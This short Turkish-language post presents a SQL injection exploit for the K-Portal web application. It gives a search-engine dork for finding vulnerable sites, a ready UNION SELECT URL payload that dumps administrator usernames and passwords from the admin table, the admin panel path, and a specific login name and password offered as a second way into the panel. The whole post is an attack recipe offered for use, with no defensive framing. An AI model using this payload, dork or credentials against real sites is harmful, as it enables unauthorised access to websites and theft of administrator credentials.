K-Portal Sql İnjection Açığı

#dork : "powered by k-portal"
#exploit : site.com/index2.php?Id=16+and+1=0+Union+Select+1,2,3,4,5,6,7,group_concat(User,0x9a,Pass),9,10,11,12+from+admin
#demo : Demo
#admin panel : site.com/admin
ya da ikinci yöntem
admin paneline girdikten sonra kullanıcı adı: aydın - sifre: qaq123
olarak girebilirsiniz...